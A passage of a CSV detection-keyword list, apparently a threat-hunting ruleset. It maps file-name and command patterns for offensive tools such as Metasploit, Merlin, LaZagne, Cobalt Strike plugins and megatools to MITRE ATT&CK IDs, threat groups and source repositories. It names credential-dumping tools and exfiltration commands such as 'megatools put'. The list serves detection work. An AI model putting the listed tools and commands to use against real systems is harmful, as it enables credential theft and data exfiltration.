T1027.003 - T1588.001 - T1588.002 - T1003.001 - T1003.006 - T1566.002 - T1057 - T1090 - T1018 - T1053 - T1608.001 - T1218.005 - T1016 - T1053 - T1049 - T1033 - T1016 - T1049 - T1016 - T1218.001 - T1016 - T1049 - T1033 - T1007 - T1218.005","TA0001 - TA0002 - TA0003","cobaltstrike - mimikatz - powersploit - shadowpad - winnti","Earth Lusca","Exploitation tools","https://www.trendmicro.com/content/dam/trendmicro/global/en/research/22/a/earth-lusca-employs-sophisticated-infrastructure-varied-tools-and-techniques/technical-brief-delving-deep-an-analysis-of-earth-lusca-operations.pdf","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"*megadose/holehe*","offensive_tool_keyword","holehe","holehe allows you to check if the mail is used on different sites like twitter instagram and will retrieve information on sites with the forgotten password function.","T1598.004 - T1592.002 - T1598.001","TA0003 - TA0009","N/A","N/A","Reconnaissance","https://github.com/megadose/holehe","1","1","N/A","6","10","5662","655","2023-09-15T21:14:10Z","2020-06-25T23:03:02Z" +"*megadose@protonmail.com*","offensive_tool_keyword","holehe","holehe allows you to check if the mail is used on different sites like twitter instagram and will retrieve information on sites with the forgotten password function.","T1598.004 - T1592.002 - T1598.001","TA0003 - TA0009","N/A","N/A","Reconnaissance","https://github.com/megadose/holehe","1","1","N/A","6","10","5662","655","2023-09-15T21:14:10Z","2020-06-25T23:03:02Z" +"*megatools copy -l * -r *","greyware_tool_keyword","megatools","Megatools is a collection of free and open source programs for accessing Mega service from a command line. 
Abused by attackers for data exfiltration","T1567.002 - T1020 - T1039","TA0010 ","N/A","N/A","Data Exfiltration","https://github.com/megous/megatools","1","0","N/A","9",,"N/A",,, +"*megatools put *","greyware_tool_keyword","megatools","Megatools is a collection of free and open source programs for accessing Mega service from a command line. Abused by attackers for data exfiltration","T1567.002 - T1020 - T1039","TA0010 ","N/A","N/A","Data Exfiltration","https://github.com/megous/megatools","1","0","N/A","9",,"N/A",,, +"*meliht/Mr.SIP*","offensive_tool_keyword","Mr.SIP","Mr.SIP is a simple console based SIP-based Audit and Attack Tool. Originally it was developed to be used in academic work to help developing novel SIP-based DDoS attacks and then as an idea to convert it to a fully functional SIP-based penetration testing tool. So far Mr SIP resulted several academic research papers. and journal articles. Mr.SIP can also be used as SIP client simulator and SIP traffic generator.","T1522 - T1521 - T1523 - T1505 - T1506","TA0010 - TA0002 - TA0043","N/A","N/A","Exploitation tools","https://github.com/meliht/Mr.SIP","1","1","N/A","N/A","4","366","100","2023-05-21T08:11:20Z","2017-09-07T18:23:00Z" +"*Memcrashed-DDoS-Exploit*","offensive_tool_keyword","Memcrashed-DDoS-Exploit","This tool allows you to send forged UDP packets to Memcached servers obtained from Shodan.io","T1436 - T1498 - T1216 - T1190","TA0043 - TA0044 - TA0001","N/A","N/A","Exploitation tools","https://github.com/649/Memcrashed-DDoS-Exploit","1","1","N/A","N/A","10","1279","493","2022-12-02T07:14:59Z","2018-03-02T21:19:51Z" +"*memfd implant *.elf*","offensive_tool_keyword","nimbo-c2","Nimbo-C2 is yet another (simple and lightweight) C2 framework","T1059 - T1078 - T1102 - T1105 - T1132 - T1136 - T1140 - T1204 - T1219 - T1543 - T1547 - T1553 - T1573 - T1574 - T1608","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0007 - 
TA0011","N/A","N/A","C2","https://github.com/itaymigdal/Nimbo-C2","1","0","N/A","10","10","234","35","2023-10-01T08:09:18Z","2022-10-08T19:02:58Z"
+"*memfd task *.elf*","offensive_tool_keyword","nimbo-c2","Nimbo-C2 is yet another (simple and lightweight) C2 framework","T1059 - T1078 - T1102 - T1105 - T1132 - T1136 - T1140 - T1204 - T1219 - T1543 - T1547 - T1553 - T1573 - T1574 - T1608","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0007 - TA0011","N/A","N/A","C2","https://github.com/itaymigdal/Nimbo-C2","1","0","N/A","10","10","234","35","2023-10-01T08:09:18Z","2022-10-08T19:02:58Z"
+"*memory*mimipy.py*","offensive_tool_keyword","LaZagne","The LaZagne project is an open source application used to retrieve lots of passwords stored on a local computer. Each software stores its passwords using different techniques (plaintext APIs custom algorithms databases etc.). This tool has been developed for the purpose of finding these passwords for the most commonly-used software.","T1552 - T1003 - T1555","TA0006 - TA0008","N/A","N/A","Credential Access","https://github.com/AlessandroZ/LaZagne","1","1","N/A","10","10","8530","1980","2023-08-12T12:38:22Z","2015-02-16T14:10:02Z"
+"*memory/onepassword.py*","offensive_tool_keyword","LaZagne","The LaZagne project is an open source application used to retrieve lots of passwords stored on a local computer. Each software stores its passwords using different techniques (plaintext APIs custom algorithms databases etc.). 
This tool has been developed for the purpose of finding these passwords for the most commonly-used software.","T1552 - T1003 - T1555","TA0006 - TA0008","N/A","N/A","Credential Access","https://github.com/AlessandroZ/LaZagne","1","1","N/A","10","10","8530","1980","2023-08-12T12:38:22Z","2015-02-16T14:10:02Z"
+"*memorydump.py*","offensive_tool_keyword","donpapi","Dumping DPAPI credentials remotely","T1003.006 - T1021.001","TA0006 - TA0008","N/A","N/A","Credential Access","https://github.com/login-securite/DonPAPI","1","1","N/A","N/A","8","732","95","2023-10-03T05:27:06Z","2021-09-27T09:12:51Z"
+"*memorydump.py*","offensive_tool_keyword","LaZagne","The LaZagne project is an open source application used to retrieve lots of passwords stored on a local computer. Each software stores its passwords using different techniques (plaintext APIs custom algorithms databases etc.). This tool has been developed for the purpose of finding these passwords for the most commonly-used software.","T1552 - T1003 - T1555","TA0006 - TA0008","N/A","N/A","Credential Access","https://github.com/AlessandroZ/LaZagne","1","1","N/A","10","10","8530","1980","2023-08-12T12:38:22Z","2015-02-16T14:10:02Z"
+"*memreader *access_token*","offensive_tool_keyword","cobaltstrike","MemReader Beacon Object File will allow you to search and extract specific strings from a target process memory and return what is found to the beacon output","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - 
T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/trainr3kt/MemReader_BoF","1","0","N/A","10","10","26","3","2022-05-12T18:46:02Z","2021-04-21T20:51:25Z"
+"*MemReader_BoF.*","offensive_tool_keyword","cobaltstrike","MemReader Beacon Object File will allow you to search and extract specific strings from a target process memory and return what is found to the beacon output","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/trainr3kt/MemReader_BoF","1","1","N/A","10","10","26","3","2022-05-12T18:46:02Z","2021-04-21T20:51:25Z"
+"*merlin-*.zip*","offensive_tool_keyword","mythic","Cross-platform post-exploitation HTTP Command & Control agent written in golang","T1021 - 
T1021.002 - T1024 - T1027 - T1032 - T1059 - T1070 - T1071 - T1105 - T1106 - T1107 - T1112 - T1204","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008","N/A","N/A","C2","https://github.com/MythicAgents/merlin","1","1","N/A","10","10","58","10","2023-08-11T15:02:23Z","2021-01-25T12:36:46Z"
+"*Merlin_v0.1Beta.zip*","offensive_tool_keyword","kubesploit","Kubesploit is a cross-platform post-exploitation HTTP/2 Command & Control server and agent written in Golang","T1021.001 - T1027 - T1071.001 - T1043 - T1059.006","TA0005 - TA0002 - TA0011","N/A","N/A","C2","https://github.com/cyberark/kubesploit","1","1","N/A","10","10","1030","102","2023-04-08T08:32:23Z","2021-02-09T15:54:23Z"
+"*merlinAgent-*.7z*","offensive_tool_keyword","merlin","Merlin is a cross-platform post-exploitation HTTP/2 Command & Control server and agent written in golang.","T1021 - T1021.002 - T1024 - T1027 - T1032 - T1059 - T1070 - T1071 - T1086 - T1105 - T1106 - T1107 - T1112 - T1204 - T1566","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008","N/A","N/A","C2","https://github.com/Ne0nd0g/merlin","1","1","N/A","10","10","4619","762","2023-08-27T15:47:13Z","2017-01-06T11:18:20Z"
+"*merlinAgent-*.exe*","offensive_tool_keyword","merlin","Merlin is a cross-platform post-exploitation HTTP/2 Command & Control server and agent written in golang.","T1021 - T1021.002 - T1024 - T1027 - T1032 - T1059 - T1070 - T1071 - T1086 - T1105 - T1106 - T1107 - T1112 - T1204 - T1566","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008","N/A","N/A","C2","https://github.com/Ne0nd0g/merlin","1","1","N/A","10","10","4619","762","2023-08-27T15:47:13Z","2017-01-06T11:18:20Z"
+"*merlinAgent.exe*","offensive_tool_keyword","kubesploit","Kubesploit is a cross-platform post-exploitation HTTP/2 Command & Control server and agent written in Golang","T1021.001 - T1027 - T1071.001 - T1043 - T1059.006","TA0005 - TA0002 - 
TA0011","N/A","N/A","C2","https://github.com/cyberark/kubesploit","1","1","N/A","10","10","1030","102","2023-04-08T08:32:23Z","2021-02-09T15:54:23Z"
+"*merlinAgent-Darwin-*","offensive_tool_keyword","merlin","Merlin is a cross-platform post-exploitation HTTP/2 Command & Control server and agent written in golang.","T1021 - T1021.002 - T1024 - T1027 - T1032 - T1059 - T1070 - T1071 - T1086 - T1105 - T1106 - T1107 - T1112 - T1204 - T1566","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008","N/A","N/A","C2","https://github.com/Ne0nd0g/merlin","1","1","N/A","10","10","4619","762","2023-08-27T15:47:13Z","2017-01-06T11:18:20Z"
+"*merlinAgent-Linux-*","offensive_tool_keyword","merlin","Merlin is a cross-platform post-exploitation HTTP/2 Command & Control server and agent written in golang.","T1021 - T1021.002 - T1024 - T1027 - T1032 - T1059 - T1070 - T1071 - T1086 - T1105 - T1106 - T1107 - T1112 - T1204 - T1566","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008","N/A","N/A","C2","https://github.com/Ne0nd0g/merlin","1","1","N/A","10","10","4619","762","2023-08-27T15:47:13Z","2017-01-06T11:18:20Z"
+"*merlinAgent-Windows-x64.exe*","offensive_tool_keyword","kubesploit","Kubesploit is a cross-platform post-exploitation HTTP/2 Command & Control server and agent written in Golang","T1021.001 - T1027 - T1071.001 - T1043 - T1059.006","TA0005 - TA0002 - TA0011","N/A","N/A","C2","https://github.com/cyberark/kubesploit","1","1","N/A","10","10","1030","102","2023-04-08T08:32:23Z","2021-02-09T15:54:23Z"
+"*MerlinCheatSheet.pdf*","offensive_tool_keyword","kubesploit","Kubesploit is a cross-platform post-exploitation HTTP/2 Command & Control server and agent written in Golang","T1021.001 - T1027 - T1071.001 - T1043 - T1059.006","TA0005 - TA0002 - TA0011","N/A","N/A","C2","https://github.com/cyberark/kubesploit","1","1","N/A","10","10","1030","102","2023-04-08T08:32:23Z","2021-02-09T15:54:23Z"
+"*merlinServer-*.7z*","offensive_tool_keyword","merlin","Merlin is a cross-platform 
post-exploitation HTTP/2 Command & Control server and agent written in golang.","T1021 - T1021.002 - T1024 - T1027 - T1032 - T1059 - T1070 - T1071 - T1086 - T1105 - T1106 - T1107 - T1112 - T1204 - T1566","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008","N/A","N/A","C2","https://github.com/Ne0nd0g/merlin","1","1","N/A","10","10","4619","762","2023-08-27T15:47:13Z","2017-01-06T11:18:20Z"
+"*merlinServer-*.exe*","offensive_tool_keyword","merlin","Merlin is a cross-platform post-exploitation HTTP/2 Command & Control server and agent written in golang.","T1021 - T1021.002 - T1024 - T1027 - T1032 - T1059 - T1070 - T1071 - T1086 - T1105 - T1106 - T1107 - T1112 - T1204 - T1566","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008","N/A","N/A","C2","https://github.com/Ne0nd0g/merlin","1","1","N/A","10","10","4619","762","2023-08-27T15:47:13Z","2017-01-06T11:18:20Z"
+"*merlinserver.go*","offensive_tool_keyword","kubesploit","Kubesploit is a cross-platform post-exploitation HTTP/2 Command & Control server and agent written in Golang","T1021.001 - T1027 - T1071.001 - T1043 - T1059.006","TA0005 - TA0002 - TA0011","N/A","N/A","C2","https://github.com/cyberark/kubesploit","1","1","N/A","10","10","1030","102","2023-04-08T08:32:23Z","2021-02-09T15:54:23Z"
+"*merlinserver_windows_x64.exe*","offensive_tool_keyword","kubesploit","Kubesploit is a cross-platform post-exploitation HTTP/2 Command & Control server and agent written in Golang","T1021.001 - T1027 - T1071.001 - T1043 - T1059.006","TA0005 - TA0002 - TA0011","N/A","N/A","C2","https://github.com/cyberark/kubesploit","1","1","N/A","10","10","1030","102","2023-04-08T08:32:23Z","2021-02-09T15:54:23Z"
+"*merlinServer-Linux*","offensive_tool_keyword","merlin","Merlin is a cross-platform post-exploitation HTTP/2 Command & Control server and agent written in golang.","T1021 - T1021.002 - T1024 - T1027 - T1032 - T1059 - T1070 - T1071 - T1086 - T1105 - T1106 - T1107 - T1112 - T1204 - T1566","TA0002 - TA0003 - TA0004 - TA0005 - 
TA0006 - TA0008","N/A","N/A","C2","https://github.com/Ne0nd0g/merlin","1","1","N/A","10","10","4619","762","2023-08-27T15:47:13Z","2017-01-06T11:18:20Z"
+"*merlinServerLog.txt*","offensive_tool_keyword","kubesploit","Kubesploit is a cross-platform post-exploitation HTTP/2 Command & Control server and agent written in Golang","T1021.001 - T1027 - T1071.001 - T1043 - T1059.006","TA0005 - TA0002 - TA0011","N/A","N/A","C2","https://github.com/cyberark/kubesploit","1","1","N/A","10","10","1030","102","2023-04-08T08:32:23Z","2021-02-09T15:54:23Z"
+"*mertdas/RedPersist*","offensive_tool_keyword","RedPersist","RedPersist is a Windows Persistence tool written in C#","T1053 - T1547 - T1112","TA0004 - TA0005 - TA0040","N/A","N/A","Persistence","https://github.com/mertdas/RedPersist","1","1","N/A","10","2","134","20","2023-09-25T19:58:47Z","2023-08-13T22:10:46Z"
+"*mertdas/SharpLDAP*","offensive_tool_keyword","SharpLDAP","tool written in C# that aims to do enumeration via LDAP queries","T1018 - T1069.003","TA0007 - TA0011","N/A","N/A","Discovery","https://github.com/mertdas/SharpLDAP","1","1","N/A","8","1","50","7","2023-01-14T21:52:36Z","2022-11-16T00:38:43Z"
+"*mertdas/SharpTerminator*","offensive_tool_keyword","SharpTerminator","Terminate AV/EDR Processes using kernel driver","T1055.003 - T1547.001 - T1053.005 - T1091 - T1014 - T1053.006 - T1053.004 - T1112 - T1112.001","TA0007 - TA0008 - TA0006 - TA0002","N/A","N/A","Exploitation tools","https://github.com/mertdas/SharpTerminator","1","1","N/A","N/A","3","266","53","2023-06-12T00:38:54Z","2023-06-11T06:35:51Z"
+"*MessageBox.Show*Pwned*","offensive_tool_keyword","ysoserial.net","Deserialization payload generator for a variety of .NET formatters","T1059.007 - T1027.002 - T1059.001","TA0005 - TA0040","N/A","N/A","Exploitation Tools","https://github.com/pwntester/ysoserial.net","1","0","N/A","10","10","2726","442","2023-06-27T12:08:11Z","2017-09-18T17:48:08Z"
+"*messagebox_reflective.dll*","offensive_tool_keyword","SharPyShell","SharPyShell - tiny and obfuscated ASP.NET webshell for C# web","T1100 - T1059 - T1505","TA0002 - TA0003 - TA0004","N/A","N/A","Web Attacks","https://github.com/antonioCoco/SharPyShell","1","1","N/A","N/A","9","809","144","2023-09-27T08:48:31Z","2019-03-10T22:09:40Z"
+"*met_inject.py*","offensive_tool_keyword","crackmapexec","A swiss army knife for pentesting networks","T1210 T1570 T1021 T1595 T1592 T1589 T1590 ","N/A","N/A","N/A","POST Exploitation tools","https://github.com/Porchetta-Industries/CrackMapExec","1","0","N/A","N/A","10","7683","1597","2023-09-09T14:19:36Z","2015-08-14T14:11:55Z"
+"*metagoofil*","offensive_tool_keyword","metagoofil","Metagoofil is a tool for extracting metadata of public documents (pdf.doc.xls.ppt..etc) availables in the target websites.This information could be useful because you can get valid usernames. people names. for using later in bruteforce password attacks (vpn. ftp. webapps). the tool will also extracts interesting paths of the documents. where we can get shared resources names. server names... etc.","T1213 - T1596 - T1083 - T1082","TA0007 - TA0009 - TA0004","N/A","N/A","Information Gathering","https://github.com/laramies/metagoofi","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A"
+"*metame -i *.exe*","offensive_tool_keyword","metame","metame is a metamorphic code engine for arbitrary executables","T1027 - T1059.003 - T1140","TA0005 - TA0009","N/A","N/A","Defense Evasion","https://github.com/a0rtega/metame","1","0","N/A","N/A","6","508","96","2019-10-06T18:24:14Z","2016-08-07T13:56:57Z"
+"*Metasploit*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. 
Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31317","13504","2023-10-04T21:36:25Z","2011-08-30T06:13:20Z"
+"*metasploit.go*","offensive_tool_keyword","Slackor","A Golang implant that uses Slack as a command and control server","T1059.003 - T1071.004 - T1562.001","TA0002 - TA0010 - TA0011","N/A","N/A","C2","https://github.com/Coalfire-Research/Slackor","1","1","N/A","10","10","451","108","2023-02-25T03:35:15Z","2019-06-18T16:01:37Z"
+"*metasploit.rb*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. 
security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31317","13504","2023-10-04T21:36:25Z","2011-08-30T06:13:20Z"
+"*metasploit/framework*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. 
security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31317","13504","2023-10-04T21:36:25Z","2011-08-30T06:13:20Z"
+"*metasploit/peass.rb*","offensive_tool_keyword","PEASS","PEASS - Privilege Escalation Awesome Scripts SUITE","T1068 - T1055 - T1053 - T1059 - T1134 - T1216 - T1003 - T1187 - T1548.001 - T1548.002","TA0002 - TA0004 - TA0006 - TA0008 - TA0007 - TA0005","N/A","N/A","Privilege Escalation","https://github.com/carlospolop/PEASS-ng","1","1","N/A","N/A","10","13378","2821","2023-10-04T17:36:13Z","2019-01-13T19:58:24Z"
+"*metasploit_framework.rb*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. 
security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31317","13504","2023-10-04T21:36:25Z","2011-08-30T06:13:20Z"
+"*metasploit-framework*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31317","13504","2023-10-04T21:36:25Z","2011-08-30T06:13:20Z"
+"*metasploit-framework*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. 
and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://www.metasploit.com/","1","1","N/A","10","10","N/A","N/A","N/A","N/A"
+"*metasploitframework*.msi*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31317","13504","2023-10-04T21:36:25Z","2011-08-30T06:13:20Z"
+"*MetasploitPayload.ps1*","offensive_tool_keyword","empire","Empire scripts paths. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. 
the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1149","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","1","N/A","N/A","10","7103","2790","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z"
+"*metatwin.ps1*","offensive_tool_keyword","metatwin","The project is designed as a file resource cloner. Metadata including digital signature is extracted from one file and injected into another","T1553.002 - T1114.001 - T1564.003","TA0006 - TA0010","N/A","N/A","Exploitation tools","https://github.com/threatexpress/metatwin","1","1","N/A","9","4","303","72","2022-05-18T18:32:51Z","2017-10-08T13:26:00Z"
+"*metatwin-master*","offensive_tool_keyword","metatwin","The project is designed as a file resource cloner. 
Metadata including digital signature is extracted from one file and injected into another","T1553.002 - T1114.001 - T1564.003","TA0006 - TA0010","N/A","N/A","Exploitation tools","https://github.com/threatexpress/metatwin","1","1","N/A","9","4","303","72","2022-05-18T18:32:51Z","2017-10-08T13:26:00Z"
+"*meterpreter*.rb*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31317","13504","2023-10-04T21:36:25Z","2011-08-30T06:13:20Z"
+"*meterpreter.*","offensive_tool_keyword","cobaltstrike","Malleable C2 is a domain specific language to redefine indicators in Beacon's communication. This repository is a collection of Malleable C2 profiles that you may use. 
These profiles work with Cobalt Strike 3.x","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/rsmudge/Malleable-C2-Profiles","1","1","N/A","10","10","1362","429","2021-05-18T14:45:39Z","2014-07-14T15:02:42Z"
